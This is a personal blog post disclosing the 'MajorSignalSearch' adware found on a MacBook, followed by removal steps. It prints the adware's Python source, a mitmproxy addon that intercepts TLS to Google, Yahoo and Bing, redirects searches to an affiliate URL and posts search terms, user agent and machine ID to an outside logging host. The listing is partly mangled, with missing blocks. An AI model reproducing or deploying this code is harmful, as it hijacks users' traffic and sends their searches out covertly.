This morning I discovered some malware on my wife’s MacBook Pro which had the unpleasant effect of redirecting Google search requests in Safari to Yahoo. A bit of investigation yielded a process called MajorSignalSearch that appeared to be responsible for this. The culprit was a file called MajorSignalSearch.py that relies extensively on mitmproxy to do its dirty work. Here is the source code:
import collections
import random
import datetime
from enum import Enum
import mitmproxy
from mitmproxy import ctx
from mitmproxy.exceptions import TlsProtocolException
from mitmproxy.proxy.protocol import TlsLayer, RawTCPLayer
import re
from mitmproxy.net.http import Headers
from mitmproxy.http import HTTPResponse
import json
import urllib
import urllib.request as urllib2
except ImportError:
import urllib2
class _TlsStrategy:
def __init__(self):
def should_intercept(self, server_address):
raise NotImplementedError()
class ConservativeStrategy(_TlsStrategy):
def should_intercept(self, server_address):
return GetInterceptableDomainId(server_address[0]) != None
class TlsFeedback(TlsLayer):
def _establish_tls_with_client(self):
server_address = self.server_conn.address
super(TlsFeedback, self)._establish_tls_with_client()
except TlsProtocolException as e:
raise e
# global variables
machineId = "4E033AA9-5B2E-5B0D-A384-656C144D52B1"
br = "1007"
searchUrl = "http://lkysearchds4407-a.akamaihd.net/ps?_pg=4E033AA9-5B2E-5B0D-A384-656C144D52B1&q=@@SearchTerm@@"
interceptableDomains = {"1":[{"Id":"1","Domain":".google.","IsRegex":"False"}],"2":[{"Id":"2","Domain":".yahoo.","IsRegex":"False"}],"3":[{"Id":"3","Domain":".bing.","IsRegex":"False"}]}
searchMatches = {"1":{"Id":"1","MatchRegex":"https?://[^/]*/search\\?.*?[?&]q=","SearchQueryParam":"q"},"2":{"Id":"2","MatchRegex":"^https?:\\/\\/[^\\/]*\\/search.*?[?&]p=*((?!ANYS_.|Tarrv_.|__alt__ddc_srch_searchpulse_net|hspart=sz&.*?type=type801[^&]*).)*$","SearchQueryParam":"p"},"3":{"Id":"3","MatchRegex":"^https?:\\/\\/[^\\/]*\\/search.*?[?&]q=((?!AEE67B61E61).)*$","SearchQueryParam":"q"}}
domainMaps = {"1":["1"],"2":["2"],"3":["3"]}
userAgents = [".*?\\)\\s*[^\\)]+(?:(?<!Chrome)/[0-9\\.]+ Safari/([0-9\\.]+))$"]
referrerChecks = {}
tls_strategy = None
intercepts = {}
yahooTypeTagRegexes = [re.compile(r'type=ANYS_.*$', re.M|re.I), re.compile(r'type=Tarrv_.*$', re.M|re.I), re.compile(r'type=[^&]*__alt__ddc_srch_searchpulse_net', re.M|re.I), re.compile(r'hspart=sz&.*?type=type801[^&]*', re.M|re.I)]
isGoogleMapRegex = re.compile(r'^https?://[^/]*\.google\.co[^/]*/.*[?&]tbm=map.*', re.M|re.I)
searchParamString = '[?&]na=([^&]+)'
scriptVersion = 1.0
responseBodyTemplate = """
<!DOCTYPE html>
<meta name="referrer" content="no-referrer" />
<meta http-equiv="Refresh" content="0; url=@@RedirectUrl@@" />
def load(l):
def configure(updated):
global tls_strategy
tls_strategy = ConservativeStrategy()
def next_layer(next_layer):
if isinstance(next_layer, TlsLayer) and next_layer._client_tls:
server_address = next_layer.server_conn.address
if tls_strategy.should_intercept(server_address):
next_layer.__class__ = TlsFeedback
#mitmproxy.ctx.log("TLS passthrough for %s" % repr(next_layer.server_conn.address), "info")
next_layer_replacement = RawTCPLayer(next_layer.ctx, ignore=True)
def GetInterceptableDomainId(domain):
for key, interceptableDomainGroup in interceptableDomains.items():
for interceptableDomain in interceptableDomainGroup:
if (interceptableDomain['IsRegex'] == 'True' and re.match(interceptableDomain['Domain'], domain)) or (interceptableDomain['IsRegex'] == 'False' and interceptableDomain['Domain'] in domain):
return interceptableDomain['Id']
return None
def SendNoIntercept(url, userAgent, referrer, searchTerm, reason):
#ctx.log.info("------------Entered SendNoIntercept: %s------------" % reason)
data = {
"ev": "pdt",
"sv": scriptVersion,
"rf": urllib.parse.quote(referrer),
"ua": userAgent,
"cg": machineId,
"br": br,
"u": urllib.parse.quote(url),
"st": urllib.parse.quote(searchTerm),
"r": reason
json_data = json.dumps(data).encode("utf-8")
method = "POST"
handler = urllib2.HTTPHandler()
opener = urllib2.build_opener(handler)
request = urllib2.Request("http://lkysearchds4407-a.akamaihd.net/olg", data=json_data)
request.get_method = lambda: method
connection = opener.open(request)
except Exception as e:
#ctx.log.error("------------Error sending message ------------\n%s:\n%s" % (e.__doc__, e.message))
def request(flow):
searchTerm = ""
referrer = flow.request.headers.get("Referer") or ""
userAgent = flow.request.headers.get("User-Agent") or ""
# abort if userAgent not in whitelist
userAgentMatches = False
for ua in userAgents:
userAgentMatches = userAgentMatches or (re.match(ua, userAgent) != None)
if not userAgentMatches:
#SendNoIntercept(flow.request.url, userAgent, referrer, "UA mismatch")
# get domain id if it exists
domainId = GetInterceptableDomainId(flow.request.host)
# abort if domain id was not found
if domainId == None:
# get valid search string ids
validDomainMaps = domainMaps[domainId]
# abort if there are no search strings
if validDomainMaps == None or not validDomainMaps:
for mapMatchId in validDomainMaps:
searchMatchItem = searchMatches[mapMatchId]
if searchMatchItem == None or not searchMatchItem:
if re.search(searchMatchItem['MatchRegex'], flow.request.url) != None:
searchQueryRegex = searchParamString.replace("na", searchMatchItem['SearchQueryParam'])
searchTerm = re.search(searchQueryRegex, flow.request.url).group(1)
skipReferrerCheck = referrerChecks.get(domainId, 'False')
if not searchTerm:
#SendNoIntercept(flow.request.url, userAgent, referrer, "No search term")
# abort if yahoo typetag matches blacklist
if 'search.yahoo' in flow.request.host:
for pattern in yahooTypeTagRegexes:
if re.search(pattern, flow.request.url) != None:
SendNoIntercept(flow.request.url, userAgent, referrer, searchTerm, "Yahoo typetag blacklist")
# abort if google maps
if re.match(isGoogleMapRegex, flow.request.url) != None:
# abort if no referer
if skipReferrerCheck != 'True' and (referrer) != "":
SendNoIntercept(flow.request.url, userAgent, referrer, searchTerm, "Referrer exists")
# abort if request has already been made within the threshold
requestTime = datetime.datetime.now()
lastRequestTime = requestTime + datetime.timedelta(days=-1)
if searchTerm in intercepts:
lastRequestTime = intercepts[searchTerm]
timeDifference = requestTime - lastRequestTime
maxTimeDifference = datetime.timedelta(seconds=5)
if maxTimeDifference >= timeDifference:
SendNoIntercept(flow.request.url, userAgent, referrer, searchTerm, "Repeat search")
intercepts[searchTerm] = datetime.datetime.now()
flow.request.headers["Referer"] = ""
redirectUrl = searchUrl.replace("@@SearchTerm@@", searchTerm)
if (referrer) != "":
redirectUrl = redirectUrl + "&s=" + domainId
responseBody = responseBodyTemplate.replace("@@RedirectUrl@@", redirectUrl)
flow.response = HTTPResponse.make(
302, # (optional) status code
responseBody.encode('utf-8'), # (optional) content
{"Content-Type": "text/html"} # (optional) headers
This file and some others were in /var/root/.MajorSignalSearch. I also had to kill the daemon and remove the plist file in /Users/$USER/Library/Application Support/com.MajorSignalSearch/MajorSignalSearch
I just wanted to create this post hoping Google would index it and perhaps lead other affected people to a solution.
This post should not be construed as criticism of mitmproxy in any way, as I had never heard from it until I looked at the malware source code…